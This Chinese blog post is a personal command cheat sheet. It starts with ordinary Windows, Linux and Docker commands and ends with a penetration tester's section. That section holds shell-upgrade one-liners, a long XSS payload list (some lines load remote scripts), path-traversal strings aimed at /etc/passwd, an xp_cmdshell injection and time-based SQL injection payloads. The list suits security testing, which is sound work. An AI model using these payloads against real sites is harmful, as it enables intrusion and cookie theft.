工作中_常用命令

工作中_常用命令

个人工作中会用到的命令,做个记录以免用到时到处找

windows

切换目录

切换盘符:如d盘输入:d:,就行

cd 要换的路径

跟踪路由
  1. tracert 目标地址:跟踪到达目标地址经过的路由节点,并显示每个节点的延迟时间。
  2. pathping 目标地址:与 tracert 类似,但提供了更详细的统计信息,包括每个节点的丢包率和往返时间。
  3. ping -r 跳数 目标地址:发送一系列 ICMP 回显请求,同时设置 IP 路由选项以限制跃点数。这将模拟通过特定数量的跃点到达目标地址的路径。
  4. nslookup 目标地址:查找目标地址的 IP 地址,并显示与之相关的 DNS 信息,如域名、IP 地址、DNS 服务器等。
windows 查看端口占用

netstat -ano 列出当前系统上所有的网络连接和监听端口,并显示相关的进程 ID(PID)

tasklist | findstr PID (将 “PID” 替换为实际的进程 ID)来查看与该 PID 相关联的进程名称

  • 杀死进程

taskkill /F /PID 进程PID 其中,“/F” 表示强制终止进程

linux

  • 创建目录

mkdir 目录

  • 创建文件
  1. 使用 touch 命令:
    • touch filename:创建一个名为 “filename” 的空文件。如果文件已存在,则更新文件的访问和修改时间。
  2. 使用 echo 命令:
    • echo "content" > filename:创建一个名为 “filename” 的文件,并将 “content” 写入该文件。如果文件已存在,则会覆盖原有内容。
    • echo "content" >> filename:创建一个名为 “filename” 的文件,并将 “content” 追加到该文件的末尾。如果文件不存在,则会创建新文件并写入内容。
  3. 使用文本编辑器:
    • vi filename:用 vi 编辑器创建一个名为 “filename” 的文件。在 vi 编辑器中,按下 i 键进入插入模式,输入文件内容,然后按下 Esc 键退出插入模式。最后,输入 :wq 并按下回车键保存并退出 vi 编辑器。
  • 删除目录、文件

rm -rf 目录或文件

rm -rf ac* 删除以ac开头的所有东西

查找[find]
find /path/to/search -options search_criteria
/path/to/search:指定要进行搜索的目录路径。
-options:可以是多个不同的选项,用于指定搜索条件。
search_criteria:根据需要指定的搜索条件,如文件名、大小、类型等。
常见选项和搜索条件
-name "filename":按照文件名进行搜索,可以使用通配符进行模糊匹配,例如 *.txt。
-type f:搜索文件。
-type d:搜索目录。
-size +10M:搜索大于 10MB 的文件,也可以使用 -size -10M 来搜索小于 10MB 的文件。
-empty:搜索空文件或空目录。
-exec:对搜索到的文件执行特定的命令,例如 -exec ls -l {} \;。
示例
在 /home/user 目录下查找所有以 ".txt" 结尾的文件:

find /home/user -name "*.txt" -type f
在整个文件系统中查找大于 100MB 的文件:

find / -size +100M -type f
在当前目录及子目录中查找空文件或空目录:

find . -empty
查找(搜索)[grep]
grep 是一个强大的文本搜索工具,用于在文件中查找特定的字符串模式,并将匹配的行打印出来。以下是对 grep 命令的详细解释和一些常见用法:

基本语法
grep options pattern file
options:可以是多个不同的选项,用于指定搜索条件和控制输出格式。
pattern:要搜索的字符串模式,可以是简单的字符串,也可以是正则表达式。
file:要在其中进行搜索的文件名。
常见选项
-i:忽略大小写。
-n:显示匹配行的行号。
-v:反转匹配,只显示不匹配的行。
-r:递归搜索子目录。
-E:使用扩展的正则表达式。
-o:仅显示匹配的部分。
示例
在文件 "file.txt" 中搜索包含 "keyword" 的所有行:

grep "keyword" file.txt
在多个文件中递归搜索包含 "pattern" 的行,并显示行号:

grep -n -r "pattern" /path/to/directory
在文件 "file.txt" 中使用正则表达式搜索匹配的行,并仅显示匹配的部分:

grep -o -E "^\d+" file.txt
查看进程
ps 命令用于显示当前运行的进程。常见的选项包括:

aux:显示所有用户的所有进程。
u:以用户为主的格式输出。
x:显示没有控制终端的进程。
示例:

ps aux

top 命令以交互方式实时显示系统中各个进程的资源占用情况,包括 CPU 占用率、内存占用率等。在 top 命令界面,你可以使用键盘上的不同按键来进行排序、过滤和其他操作。

示例:

top
结束进程
除了查看进程外,你还可以使用 kill 命令结束特定的进程。比如,如果要结束进程号为 PID 的进程,可以使用以下命令:

kill PID
杀死进程
kill -9 pid
查看端口占用
sudo lsof -i :6001

这将列出所有正在监听端口 6001 的进程信息。

请注意,使用这些命令时需要相应的权限,因此在MacOS或Linux上可能需要使用sudo来获取足够的权限。
解压文件
在 Linux 系统中,可以使用多种命令来解压文件,最常用的是 tar、unzip 和 unrar 命令,它们分别用于解压不同类型的压缩文件。

解压 .tar 文件
.tar 文件通常是使用 tar 命令打包而成的,要解压这种文件,可以使用以下命令:

bash
tar -xvf filename.tar
-x:表示解压缩。
-v:显示详细的解压过程。
-f:指定要解压的文件名。
如果文件被压缩过,通常会有额外的压缩格式,比如 .tar.gz 或 .tar.bz2,此时需要使用额外的选项来进行解压。

解压 .tar.gz 或 .tgz 文件
.tar.gz 文件是先使用 tar 打包,再使用 gzip 压缩得到的,解压时可以使用以下命令:

bash
tar -xzvf filename.tar.gz
-z:表示使用 gzip 解压缩。
解压 .tar.bz2 文件
.tar.bz2 文件是先使用 tar 打包,再使用 bzip2 压缩得到的,解压时可以使用以下命令:

bash
tar -xjvf filename.tar.bz2
-j:表示使用 bzip2 解压缩。
解压 .zip 文件
.zip 文件是常见的 Windows 压缩格式,在 Linux 中可以使用 unzip 命令进行解压,命令如下:

bash
unzip filename.zip
解压 .rar 文件
.rar 文件是另一种常见的压缩格式,可以使用 unrar 命令进行解压,命令如下:

bash
unrar x filename.rar
docker
Docker 是一个广泛使用的容器化平台,以下是一些常用的 Docker 命令:

docker pull <image_name>: 下载 Docker 镜像。

docker images: 列出本地所有的 Docker 镜像。

docker ps: 列出当前正在运行的容器。

docker ps -a: 列出所有的容器,包括运行中的和已停止的。

docker run <options> <image_name>: 运行一个容器,可以使用 -d 选项让容器在后台运行。

docker stop <container_id>: 停止指定的容器。

docker start <container_id>: 启动已经停止的容器。

docker rm <container_id>: 删除一个已经停止的容器。

docker rmi <image_name>: 删除一个本地的 Docker 镜像。

docker exec -it <container_id> <command>: 在运行中的容器中执行命令。

docker logs <container_id>: 查看容器的日志输出。

docker build <path_to_Dockerfile>: 根据 Dockerfile 构建一个新的镜像。

docker run -d \
    --name lsky-pro \
    --restart unless-stopped \
    -p 8045:8089 \
    -v $PWD/lsky:/var/www/html \
    -e WEB_PORT=8089 \
    halcyonazure/lsky-pro-docker:latest
    
在Docker中,-p 8089:8084表示将容器内部的8084端口映射到宿主机的8089端口。
安装文件
1. 使用包管理器
大多数 Linux 发行版都提供了包管理器来方便地安装、升级和移除软件。常见的包管理器有 apt(Debian/Ubuntu)、yum(Red Hat/CentOS)和 zypper(openSUSE)。使用包管理器安装软件非常简单,只需要运行相应的命令即可,例如:

bash
# 使用 apt 安装软件
sudo apt install package_name

# 使用 yum 安装软件
sudo yum install package_name
这些命令会从软件源中下载并安装指定的软件包,并且会自动处理依赖关系。

2. 通过源代码编译安装
有些软件可能没有被打包到系统的软件源中,或者你希望使用最新版本的软件,这时就需要通过源代码编译安装。通常的步骤如下:

下载源代码压缩包并解压缩。
进入解压后的目录,查看里面是否有 README 或 INSTALL 文件,里面通常包含了安装说明。
通常情况下,你需要运行以下命令:
bash
./configure
make
sudo make install
后台运行
在 Linux 中,可以使用多种方式将命令在后台运行,这样可以让命令在不占用当前终端的情况下继续执行。

1. 使用 & 符号
最简单的方法是在命令末尾加上 & 符号,例如:

bash
command &
这样就可以让 command 在后台运行,终端会立即返回提示符,而命令会继续在后台执行。

2. 使用 nohup 命令
nohup 命令可以让命令忽略 SIGHUP 信号(终端关闭信号),并且将命令的输出重定向到指定文件中,例如:

bash
nohup command > output.log 2>&1 &
这样就可以让 command 在后台运行,并将标准输出和错误输出都重定向到 output.log 文件中,同时忽略 SIGHUP 信号。

3. 使用 screen 或 tmux 工具
screen 和 tmux 是终端复用工具,它们允许你在一个终端窗口中创建多个会话,并且可以在后台运行这些会话中的命令。使用这两个工具,你可以在其中创建一个会话,运行你的命令,然后 detach(分离)这个会话,让命令在后台继续执行,例如:

bash
# 使用 screen 创建会话并运行命令
screen -S session_name
command
按下 Ctrl+A 再按下 D 分离会话

# 使用 tmux 创建会话并运行命令
tmux new-session -s session_name "command"
按下 Ctrl+B 再按下 D 分离会话

python

pip 使用国内镜像源
-i https://pypi.tuna.tsinghua.edu.cn/simple

我们可以直接在 pip 命令中使用 -i 参数来指定镜像地址,例如:

pip3 install numpy -i https://pypi.tuna.tsinghua.edu.cn/simple
以上命令使用清华镜像源安装 numpy 包。
交互式shell
一般打完是非交互式shell,没有回显,这里使用命令切换为交互式shell(如果有python的话)

Python3
python -c 'import pty;pty.spawn('/bin/bash')'

Python2
python -c 'import pexpect;pexpect.spawn('/bin/bash')'

常用代码

bat
@echo off
set /p g=输入根域名 例test.com:
dirsearch.py -u %g%
pause
xss
1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>
 
<svg/onload=alert(1)>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
 
'><script>alert(document.cookie)</script>
 
='><script>alert(document.cookie)</script>
 
<script>alert(vulnerable)</script>
 
%3Cscript%3Ealert('XSS')%3C/script%3E
 
<script>alert('XSS')</script>
 
<img src="javascript:alert('XSS')">
<img/src=x/onerror=alert(1)>
 
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
 
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 
<script>alert('Vulnerable');</script>
 
<script>alert('Vulnerable')</script>
 
a.jsp/<script>alert('Vulnerable')</script>
 
a?<script>alert('Vulnerable')</script>
 
"><script>alert('Vulnerable')</script>
 
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
%3Cscript%3Ealert(document. domain);%3C/script%3E&
 
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 
<IMG src="javascript:alert('XSS');">
 
<IMG src=javascript:alert('XSS')>
 
<IMG src=JaVaScRiPt:alert('XSS')>
 
<IMG src=JaVaScRiPt:alert("XSS")>
 
<IMG src=javascript:alert('XSS')>
 
<IMG src=javascript:alert('XSS')>
 
<IMG src=javascript:alert('XSS')>
 
<IMG src="jav ascript:alert('XSS');">
 
<IMG src="jav ascript:alert('XSS');">
 
<IMG src="jav ascript:alert('XSS');">
 
"<IMG src=java\0script:alert(\"XSS\")>";' > out
 
<IMG src=" javascript:alert('XSS');">
 
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 
<BODY BACKGROUND="javascript:alert('XSS')">
 
<BODY ONLOAD=alert('XSS')>
 
<IMG DYNSRC="javascript:alert('XSS')">
 
<IMG LOWSRC="javascript:alert('XSS')">
 
<BGSOUND src="javascript:alert('XSS');">
 
<br size="&{alert('XSS')}">
 
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 
<LINK REL="stylesheet" href="javascript:alert('XSS');">
 
<IMG src='vbscript:msgbox("XSS")'>
 
<IMG src="mocha:[code]">
 
<IMG src="livescript:[code]">
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 
<IFRAME src=javascript:alert('XSS')></IFRAME>
 
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
 
<TABLE BACKGROUND="javascript:alert('XSS')">
 
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
 
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
 
<DIV STYLE="width: expression(alert('XSS'));">
 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
 
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<BASE href="javascript:alert('XSS');//">
 
getURL("javascript:alert('XSS')")
 
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
 
<XML src="javascript:alert('XSS');">
 
"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
 
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 
<IMG src="javascript:alert('XSS')"
 
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
 
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
 
<IMG SRC=javascript:alert(XSS)>
 
<IMG SRC=# onmouseover=”alert(‘xxs’)>
 
<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))></img>
 
<img src=x onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
 
&#39;&#88;&#83;&#83;&#39;&#41;>
 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 
<IMG SRC=”jav ascript:alert(XSS);>
 
<IMG SRC=”jav&#x0A;ascript:alert(XSS);>
 
<IMG SRC=&#14;  javascript:alert(XSS);>
 
<<SCRIPT>alert(XSS);//<</SCRIPT>
 
<IMG SRC=”javascript:alert(XSS)</script><script>alert(XSS);</script>
 
<INPUT TYPE=IMAGESRC=”javascript:alert(XSS);>
 
<BODY BACKGROUND=”javascript:alert(XSS)>
 
<svg/onload=alert('XSS')>
 
<IMG SRC=’vbscript:msgbox(XSS)>
 
<BGSOUND SRC="javascript:alert('XSS');">
 
<BR SIZE="&{alert('XSS')}">
 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
 
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<XSS STYLE="behavior: url(xss.htc);">
 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
 
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
 
<DIV STYLE="width: expression(alert('XSS'));">
 
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
 
<script>alert(/xss/)</script>
 
<svg onload=alert(document.domain)>
 
<img src=document.domain onerror=alert(document.domain)>
 
<M onmouseover=alert(document.domain)>M
 
<marquee onscroll=alert(document.domain)>
 
<a href=javascript:alert(document.domain)>M</a>
 
<body onload=alert(document.domain)>
 
<details open ontoggle=alert(document.domain)>
 
<embed src=javascript:alert(document.domain)>
 
<script>alert(1)</script>
 
<sCrIpT>alert(1)</sCrIpT>
 
<ScRiPt>alert(1)</ScRiPt>
 
<sCrIpT>alert(1)</ScRiPt>
 
<ScRiPt>alert(1)</sCrIpT>
 
<img src=1 onerror=alert(1)>
 
<iMg src=1 oNeRrOr=alert(1)>
 
<ImG src=1 OnErRoR=alert(1)>
 
<img src=1 onerror="alert(&quot;M&quot;)">
 
<marquee onscroll=alert(1)>
 
<mArQuEe OnScRoLl=alert(1)>
 
<MaRqUeE oNsCrOlL=alert(1)>
 
<a href=javascript:/0/,alert(%22M%22)>M</a>
 
<a href=javascript:/00/,alert(%22M%22)>M</a>
 
<a href=javascript:/000/,alert(%22M%22)>M</a>
 
<a href=javascript:/M/,alert(%22M%22)>M</a>
 
<base href=javascript:/M/><a href=,alert(1)>M</a>
 
<base href=javascript:/M/><iframe src=,alert(1)></iframe>
 
</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>
 
"><img src=x onerror=alert(document.cookie)>.gif
 
<div style="background-image:url(javascript:alert(/xss/))">
 
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
 
<iframe src=javascript:alert(1)></iframe>
 
<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
 
<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
 
<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
 
<iframe src=https://baidu.com width=1366 height=768></iframe>
 
<iframe src=javascript:alert(1) width=1366 height=768></iframe
 
<form action=javascript:alert(1)><input type=submit>
 
<form><button formaction=javascript:alert(1)>M
 
<form><input formaction=javascript:alert(1) type=submit value=M>
 
<form><input formaction=javascript:alert(1) type=image value=M>
 
<form><input formaction=javascript:alert(1) type=image src=1>
 
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
sql
单引号5
%27%61%6e%64%28%73%65%6c%65%63%74%2a%66%72%6f%6d%28%73%65%6c%65%63%74%2b%73%6c%65%65%70%28%35%29%29%61%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2b%31%29%3d%27

'and(select*from(select+sleep(5))a/**/union/**/select+1)=''

双引号5
%22%61%6e%64%28%73%65%6c%65%63%74%2a%66%72%6f%6d%28%73%65%6c%65%63%74%2b%73%6c%65%65%70%28%35%29%29%61%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2b%31%29%3d%22

"and(select*from(select+sleep(5))a/**/union/**/select+1)="

数字
%20%61%6e%64%28%73%65%6c%65%63%74%2a%66%72%6f%6d%28%73%65%6c%65%63%74%2b%73%6c%65%65%70%28%35%29%29%61%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2b%31%29%3d%23

/**/and(select*from(select+sleep(5)union/**/select+1)a)

5c23d52f880511ebb6edd017c2d2eca2

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值